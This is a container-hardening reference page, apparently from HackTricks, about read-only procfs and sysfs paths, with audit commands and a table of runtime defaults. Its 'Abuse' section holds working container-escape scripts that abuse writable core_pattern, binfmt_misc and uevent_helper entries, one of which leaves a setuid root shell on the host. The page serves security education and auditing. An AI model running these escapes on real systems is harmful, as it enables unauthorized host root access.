read-only-paths.md (9280B)
1 --- 2 title: "Read-Only System Paths" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/protections/read-only-paths.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/protections/read-only-paths.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Read-Only System Paths 14 15 Read-only system paths are a separate protection from masked paths. Instead of hiding a path completely, the runtime exposes it but mounts it read-only. This is common for selected procfs and sysfs locations where read access may be acceptable or operationally necessary, but writes would be too dangerous. 16 17 The purpose is straightforward: many kernel interfaces become much more dangerous when they are writable. A read-only mount does not remove all reconnaissance value, but it prevents a compromised workload from modifying the underlying kernel-facing files through that path. 18 19 ## Operation 20 21 Runtimes frequently mark parts of the proc/sys view as read-only. Depending on the runtime and host, this may include paths such as: 22 23 - `/proc/sys` 24 - `/proc/sysrq-trigger` 25 - `/proc/irq` 26 - `/proc/bus` 27 28 The actual list varies, but the model is the same: allow visibility where needed, deny mutation by default.<sup>[[1]](#references)</sup> 29 30 ## Lab 31 32 Inspect the Docker-declared read-only path list: 33 34 ```bash 35 docker inspect <container> | jq '.[0].HostConfig.ReadonlyPaths' 36 ``` 37 38 Inspect the mounted proc/sys view from inside the container: 39 40 ```bash 41 mount | grep -E '/proc|/sys' 42 find /proc/sys -maxdepth 2 -writable 2>/dev/null | head 43 find /sys -maxdepth 3 -writable 2>/dev/null | head 44 ``` 45 46 ## Security Impact 47 48 Read-only system paths narrow a large class of host-impacting abuse. Even when an attacker can inspect procfs or sysfs, being unable to write there removes many direct modification paths involving kernel tunables, crash handlers, module-loading helpers, or other control interfaces. The exposure is not gone, but the transition from information disclosure to host influence becomes harder. 49 50 ## Misconfigurations 51 52 The main mistakes are unmasking or remounting sensitive paths read-write, exposing host proc/sys content directly with writable bind mounts, or using privileged modes that effectively bypass the safer runtime defaults. In Kubernetes, `procMount: Unmasked` and privileged workloads often travel together with weaker proc protection.<sup>[[2]](#references)</sup> Another common operational mistake is assuming that because the runtime usually mounts these paths read-only, all workloads are still inheriting that default. 53 54 ## Abuse 55 56 If the protection is weak, begin by looking for writable proc/sys entries: 57 58 ```bash 59 find /proc/sys -maxdepth 3 -writable 2>/dev/null | head -n 50 # Find writable kernel tunables reachable from the container 60 find /sys -maxdepth 4 -writable 2>/dev/null | head -n 50 # Find writable sysfs entries that may affect host devices or kernel state 61 ``` 62 63 When writable entries are present, high-value follow-up paths include: 64 65 ```bash 66 cat /proc/sys/kernel/core_pattern 2>/dev/null # Crash handler path; writable access can lead to host code execution after a crash 67 cat /proc/sys/kernel/modprobe 2>/dev/null # Kernel module helper path; useful to evaluate helper-path abuse opportunities 68 cat /proc/sys/fs/binfmt_misc/status 2>/dev/null # Whether binfmt_misc is active; writable registration may allow interpreter-based code execution 69 cat /proc/sys/vm/panic_on_oom 2>/dev/null # Global OOM handling; useful for evaluating host-wide denial-of-service conditions 70 cat /sys/kernel/uevent_helper 2>/dev/null # Helper executed for kernel uevents; writable access can become host code execution 71 ``` 72 73 What these commands can reveal: 74 75 - Writable entries under `/proc/sys` often mean the container can modify host kernel behavior rather than merely inspect it. 76 - `core_pattern` is especially important because a writable host-facing value can be turned into a host code-execution path by crashing a process after setting a pipe handler. 77 - `modprobe` reveals the helper used by the kernel for module-loading related flows; it is a classic high-value target when writable. 78 - `binfmt_misc` tells you whether custom interpreter registration is possible. If registration is writable, this can become an execution primitive instead of just an information leak. 79 - `panic_on_oom` controls a host-wide kernel decision and can therefore turn resource exhaustion into host denial of service. 80 - `uevent_helper` is one of the clearest examples of a writable sysfs helper path producing host-context execution. 81 82 Interesting findings include writable host-facing proc knobs or sysfs entries that should normally have been read-only. At that point, the workload has moved from a constrained container view toward meaningful kernel influence. 83 84 ### Full Example: `core_pattern` Host Escape 85 86 If `/proc/sys/kernel/core_pattern` is writable from inside the container and points to the host kernel view, it can be abused to execute a payload after a crash: 87 88 ```bash 89 [ -w /proc/sys/kernel/core_pattern ] || exit 1 90 overlay=$(mount | sed -n 's/.*upperdir=\([^,]*\).*/\1/p' | head -n1) 91 cat <<'EOF' > /shell.sh 92 #!/bin/sh 93 cp /bin/sh /tmp/rootsh 94 chmod u+s /tmp/rootsh 95 EOF 96 chmod +x /shell.sh 97 echo "|$overlay/shell.sh" > /proc/sys/kernel/core_pattern 98 cat <<'EOF' > /tmp/crash.c 99 int main(void) { 100 char buf[1]; 101 for (int i = 0; i < 100; i++) buf[i] = 1; 102 return 0; 103 } 104 EOF 105 gcc /tmp/crash.c -o /tmp/crash 106 /tmp/crash 107 ls -l /tmp/rootsh 108 ``` 109 110 If the path really reaches the host kernel, the payload runs on the host and leaves a setuid shell behind. 111 112 ### Full Example: `binfmt_misc` Registration 113 114 If `/proc/sys/fs/binfmt_misc/register` is writable, a custom interpreter registration can produce code execution when the matching file is executed: 115 116 ```bash 117 mount | grep binfmt_misc || mount -t binfmt_misc binfmt_misc /proc/sys/fs/binfmt_misc 118 cat <<'EOF' > /tmp/h 119 #!/bin/sh 120 id > /tmp/binfmt.out 121 EOF 122 chmod +x /tmp/h 123 printf ':hack:M::HT::/tmp/h:\n' > /proc/sys/fs/binfmt_misc/register 124 printf 'HT' > /tmp/test.ht 125 chmod +x /tmp/test.ht 126 /tmp/test.ht 127 cat /tmp/binfmt.out 128 ``` 129 130 On a host-facing writable `binfmt_misc`, the result is code execution in the kernel-triggered interpreter path. 131 132 ### Full Example: `uevent_helper` 133 134 If `/sys/kernel/uevent_helper` is writable, the kernel may invoke a host-path helper when a matching event is triggered: 135 136 ```bash 137 cat <<'EOF' > /tmp/evil-helper 138 #!/bin/sh 139 id > /tmp/uevent.out 140 EOF 141 chmod +x /tmp/evil-helper 142 overlay=$(mount | sed -n 's/.*upperdir=\([^,]*\).*/\1/p' | head -n1) 143 echo "$overlay/tmp/evil-helper" > /sys/kernel/uevent_helper 144 echo change > /sys/class/mem/null/uevent 145 cat /tmp/uevent.out 146 ``` 147 148 The reason this is so dangerous is that the helper path is resolved from the host filesystem perspective rather than from a safe container-only context. 149 150 ## Checks 151 152 These checks determine whether procfs/sysfs exposure is read-only where expected and whether the workload can still modify sensitive kernel interfaces. 153 154 ```bash 155 docker inspect <container> | jq '.[0].HostConfig.ReadonlyPaths' # Runtime-declared read-only paths 156 mount | grep -E '/proc|/sys' # Actual mount options 157 find /proc/sys -maxdepth 2 -writable 2>/dev/null | head # Writable procfs tunables 158 find /sys -maxdepth 3 -writable 2>/dev/null | head # Writable sysfs paths 159 ``` 160 161 What is interesting here: 162 163 - A normal hardened workload should expose very few writable proc/sys entries. 164 - Writable `/proc/sys` paths are often more important than ordinary read access. 165 - If the runtime says a path is read-only but it is writable in practice, review mount propagation, bind mounts, and privilege settings carefully. 166 167 ## Runtime Defaults 168 169 | Runtime / platform | Default state | Default behavior | Common manual weakening | 170 | --- | --- | --- | --- | 171 | Docker Engine | Enabled by default | Docker defines a default read-only path list for sensitive proc entries | exposing host proc/sys mounts, `--privileged` | 172 | Podman | Enabled by default | Podman applies default read-only paths unless explicitly relaxed | `--security-opt unmask=ALL`, broad host mounts, `--privileged` | 173 | Kubernetes | Inherits runtime defaults | Uses the underlying runtime read-only path model unless weakened by Pod settings or host mounts | `procMount: Unmasked`, privileged workloads, writable host proc/sys mounts | 174 | containerd / CRI-O under Kubernetes | Runtime default | Usually relies on OCI/runtime defaults | same as Kubernetes row; direct runtime config changes can weaken the behavior | 175 176 The key point is that read-only system paths are usually present as a runtime default, but they are easy to undermine with privileged modes or host bind mounts. 177 178 ## References 179 180 - [1] [OCI Runtime Specification: Linux Container Configuration (maskedPaths / readonlyPaths)](https://github.com/opencontainers/runtime-spec/blob/main/config-linux.md) 181 - [2] [Kubernetes API Reference: Pod v1 (SecurityContext.procMount)](https://kubernetes.io/docs/reference/kubernetes-api/workload-resources/pod-v1/)